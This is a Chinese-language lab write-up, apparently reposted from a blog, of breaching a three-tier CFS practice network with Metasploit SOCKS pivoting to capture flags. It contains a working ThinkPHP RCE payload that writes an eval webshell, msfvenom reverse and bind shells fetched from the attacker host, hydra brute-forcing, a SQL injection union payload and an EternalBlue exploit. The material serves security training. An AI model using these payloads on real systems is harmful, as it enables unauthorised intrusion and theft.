内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

这篇具有很好参考价值的文章主要介绍了内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

CFS三层靶场搭建:

内网渗透之CFS三层靶机搭建_不知名白帽的博客-CSDN博客

目录

Socks代理实战-MSF

01渗透场景(网络拓扑)

02测试Target1

02.1信息收集

02.2分析利用(21/22/3306/8888)

02.3分析利用(80)

02.4主机信息收集

02.5建立Socks代理

03测试Target2

03.1开启代理

03.2信息收集

03.3分析利用

03.4主机信息收集

03.5建立隧道

04测试Target3

04.1信息收集

04.2分析利用


借鉴文章链接:

CFS三层靶机搭建及其内网渗透_ZredamanJ的博客-CSDN博客_cfs三层

代理技术应用之三层内网漫游 - FreeBuf网络安全行业门户

CFS三层靶机搭建及其内网渗透附靶场环境 - 安全客,安全资讯平台

Socks代理实战-MSF

01渗透场景(网络拓扑)

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

02测试Target1

02.1信息收集

nmap -sS -v -A 192.168.1.128

nmap -A -v -T4 192.168.1.128

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

02.2分析利用(21/22/3306/8888)

21/22端口:弱口令爆破

hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.128 ftp

hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.128 ssh

3306端口:不允许远程IP链接

8888端口:宝塔登录页面

02.3分析利用(80)

80端口:Thinkphp v5.0

存在远程命令执行漏洞,通过命令执行写入一句话,可GetShell

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd'])?>

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

蚁剑连接

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

发现两个flag

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

02.4主机信息收集

ifconfig

发现192.168.22.0/24内网网段

发现192.168.22.129存活主机

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

02.5建立Socks代理

msfvenom生成payload

查找可用的payload

msfvenom -l payload | grep "linux/x64" | awk "{print $l}"

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >6666.elf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6666 -f elf >6666.elf

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.130 lport=6666 -f elf >6666.php

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

上传到target1的tmp目录下

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

或者开启http服务用wgett来下载

python -m http.server(默认端口为8000)

wget http://192.168.1.130(kali的ip):8000/6666.elf

kali中配置运行监听模块

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set lhost 192.168.1.130

set lport 6666

exploit

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

chmod 777 6666.elf

./6666.elf

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

反弹shell

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

获得target1的meterpreter shell后,添加到192.168.22网段的路由

run autoroute -s 192.168.22.0/24 

run autoroute -p

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

使用msf的socks5模块建立socks服务,并配置prochains代理

search socks

use auxiliary/server/socks_proxy

set SRVHOST 0.0.0.0

set SRVPORT 1080

exploit

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

vim /etc/proxychains4.conf

socks5 192.168.1.130 1080

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

需要加上刚刚配置好的代理文件才能进行扫描

proxychains4 nmap -Pn -sT 192.168.22.128

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

03测试Target2

03.1开启代理

火狐浏览器插件foxyproxy

配置代理

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

访问192.168.22.128

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

03.2信息收集

proxychains4 nmap -Pn -sT 192.168.22.128

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

03.3分析利用

翻看一下robots.txt

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

找到后台登录地址,有验证码先不尝试爆破

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

查看源代码找到提示,存在sql注入

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” --dbs

proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms –tables

proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin –columns

proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin -C username,password –dump

注意:socks5不稳定,以用sqlmap跑就会断开

手注一下

http://192.168.22.128/index.php?r=vul&keyword=1' union select group_concat(username),group_concat(password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from bage_admin-- -

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

登录后台(admin/123qwe)

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

发现模板中存在index.php文件,可以写入一句话木马

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

 内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

来到标签页,可以看到一句话生效了,接下里在SocksCap64中打开蚁剑,利用蚁剑连接,注意SocksCap设置好代理

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

03.4主机信息收集

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

03.5建立隧道

生成正向后门

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=7777 -f elf > 7777.elf

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

msf正向连接

use exploit/multi/handler

set payload linux/x64/meterpreter/bind_tcp

set rhost 192.168.22.128

set LPORT 7777

exploit

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

开启http服务,下载7777.elf文件

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

提权并运行7777.elf

chomd 777 7777.elf

./7777.elf

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

反弹shell

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

添加路由

run autoroute -s 192.168.33.0/24

run autoroute -p

04测试Target3

04.1信息收集

proxychains4 nmap -Pn -sT 192.168.33.33

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

04.2分析利用

开启445、3389端口,我们可以用永恒之蓝进行攻击

use exploit/windows/smb/ms17_010_psexec

set payload windows/meterpreter/bind_tcp

set RHOST 192.168.33.33

exploit

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

shell

net user

 内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

cd /

dir /S /B *flag*

type C:\Windows\System32\config\flag.txt

# /B 显示文件夹或文件的名字

# /S 显示指定目录和所有子目录中的文件

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

linux无法识别window汉字会乱码,修改一下代码页(65001代表的是UTF-8)

chcp 65001

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

找到flag了文章来源地址https://www.toymoban.com/news/detail-431047.html

到了这里,关于内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 内网安全-代理Socks协议&CS-MSF控制上线

    目录 实验前提 实验环境 实验目标 环境部署 实验1 msf通信win10的56网段与正向连接  msf通信win10 msf上线win10 实验2 cs通信win10的56网段与正向连接 cs通信win10 cs上线win10   实验环境 本地计算机存在一个36网段可以与win7ping通并且可以上网。 win7存在36和52网段,可以与本地和win10p

    2024年02月16日
    浏览(28)
  • 内网渗透代理知识以及渗透某CTF三层靶机实例

            在学习完小迪内网代理安全知识后,自己也找来了案例中的CTF比赛中三层靶机,来总结一下内网代理知识。实验中成功拿到三个flag,话不多说,现在就开始。 文章目录 前言 一、 内网代理知识 二 、CTF三层靶机实例 1. 靶机拓补图 2. 攻击目标1 3.添加路由 4.开启代

    2024年02月03日
    浏览(29)
  • Neo-reGeorg通过socks5一层代理,访问内网系统-实战篇

    假设:目前已获取边界服务器(192.168.0.103)的权限,远程管理服务器 实现:通过Neo-reGeorg,使得kali能够访问内网的192.168.93.40上的主机 主机 模式 IP 网站名称 备注 边界服务器 windows server 2016 桥接vmnet 4 192.168.0.103、192.168.93.129 文件管理系统 假设已经通过文件上传获取服务器权限,

    2024年02月08日
    浏览(39)
  • 内网渗透 Metasploit(MSF)基础使用

    ​ Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在 Metasploit 和综合报

    2024年01月16日
    浏览(33)
  • 利用msf进行内网的木马渗透详细教程

    本文仅限学术交流,请勿用他人实践 本文通过kali系统进行内网渗透。主机 ip:172.20.10.14 靶机ip:172.20.10.3(win10)  文章目录 前言 一 准备工作 二 进行渗透 1.开启服务:需要开启apache和postgresql服务 2.制作木马文件,利用msf进行渗透 总结  提示:以下是本篇文章正文内容,下

    2023年04月08日
    浏览(34)
  • 论后渗透MSF之 | 添加路由和代理

    内网中添加路由主要是 充当跳板 功能, 其实是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上 添加一条去往内网的路由 ,此路由的下一跳转发,即网关,是MSF攻击平台与被攻击目标建立的一个session会话 通过msf添加路由功能,

    2024年01月16日
    浏览(36)
  • 内网安全:Socks 代理 || 本地代理 技术.

    Socks 代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为10

    2024年02月08日
    浏览(43)
  • 70内网安全-域横向内网漫游Socks代理隧道技术(下)

              这节课解决代理的问题, 他是内网里面的穿透技术,隧道主要安全设备和流量监控的拦截问题,我们在做渗透的时候需要回显数据或者一些重要的信息,走的协议不一样,tcp/ip有七层, 在不同层里面有不同的协议,有一些协议会受到防火墙,过滤设备和流量检测

    2024年02月03日
    浏览(36)
  • 内网代理的系列二:frp(socks5)+Proxifier

    环境搭建: 1台Win08虚拟机 1台Win07虚拟机 1台VPS 1台主机 网关设置 Win08虚拟机 关闭防火墙 Win07虚拟机 这种网络场景也是我们日常渗透中最常见的一种 通常我们都是socks5代理 , 实现能够访问内网主机上开放的web站点 https://github.com/fatedier/frp/releases/tag/v0.44.0 VPS: ./frps -c frps.ini

    2024年02月07日
    浏览(25)
  • 内网安全——代理技术Socks5&网络通讯&控制上线

    目录 (一)前置知识 0x01 单机——防火墙之限制出入站 常见主机配置不出网的方式

    2023年04月23日
    浏览(29)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包